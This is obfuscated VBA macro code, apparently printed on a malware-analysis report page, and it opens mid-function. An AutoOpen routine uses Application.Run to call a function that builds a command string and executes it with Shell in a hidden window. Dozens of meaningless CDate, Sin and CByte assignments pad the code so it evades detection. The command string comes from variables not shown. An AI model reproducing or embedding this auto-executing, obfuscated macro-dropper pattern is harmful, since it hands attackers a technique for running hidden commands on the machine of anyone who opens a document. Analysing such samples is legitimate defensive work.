XLEiXI = CDate(kPpKfw + Sin(82504 + 87739) * 60459 * CInt(43601))
VPGSb = 36984
YPjhDk = 42174
vacETs = CByte(wOIGC)
JPfhC = CDate(90738)
zozIiAohQm = zpFsEMD + Chr(GJjXH + 80 + EkOcEiHvHj)
wJrNhE = Hzcww
RnJJdZ = CDate(NpRGGW + Sin(74091 + 27214) * 76438 * CInt(41290))
jKsbjZ = 96871
IDbmY = 13743
DMQkJa = CByte(pUVjz)
hivffQ = CDate(89896)
nzqSTi = CoJaL
uzpju = CDate(woPhci + Sin(58560 + 83710) * 8561 * CInt(17468))
fBUbfE = 49927
nrcpU = 90230
PuTIJE = CByte(lIDGE)
WaIRsN = CDate(95341)
tqYSzIdHqlW = rVqwvJijSwT + zozIiAohQm + CWqiKVjzwIw + amNPIo + ktzAKOu + wHaMwdHDdw
FMihdU = sdHzI
lCpWJi = CDate(YpUVa + Sin(23999 + 78947) * 53841 * CInt(61315))
bOJVws = 42669
zTnbr = 46721
aIiVzc = CByte(NHkbR)
iGlVd = CDate(9057)
End Function
Function IkVMfoIB(KQMIblIjO)
On Error Resume Next
ZuhSi = ROjri
CmkzD = CDate(XsrSA + Sin(11362 + 64995) * 80061 * CInt(84137))
HMUPh = 45675
jzARGS = 23682
OBEhCa = CByte(QQWMI)
kdfXPP = CDate(32793)
rnrZzf = HfMtzW
tSjzP = CDate(dEowTj + Sin(20465 + 56271) * 25012 * CInt(4835))
TkwNj = 46233
jqLfmd = 5810
EMCzu = CByte(HzUiwm)
VWOMi = CDate(86711)
HKABno = kKFriWbGzhM + Shell(EipUXVCEt + KQMIblIjO + DJXiAYiIzt, 11856 - 11856)
soYlz = LzAZvq
zaZiHV = CDate(XrHVsE + Sin(79932 + 71457) * 57791 * CInt(80114))
RJCIYO = 30189
iWcZh = 88840
WITjUq = CByte(ntmzr)
RjHSKk = CDate(86091)
End Function
Sub AutoOpen()
On Error Resume Next
RNUmTB = FzkEz
VbQDjn = CDate(XWIjT + Sin(96805 + 24787) * 38680 * CInt(48494))
NVSQC = 60918
nBmnd = 7933
wfbwdc = CByte(rDaLbw)
IVJcA = CDate(87309)
Application.Run WbzVtaK + "IkVMfoIB" + zhnmfliSpc, kjAwHwUEW + tqYSzIdHqlW + criSL
ziQEad = NjbiH
UhhKj = CDate(OfYXi + Sin(35812 + 72490) * 68704 * CInt(70061))
utppT = 64254
HmqwUz = 90678
cIzFn = CByte(iKnZEC)
DwlCw = CDate(45440)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.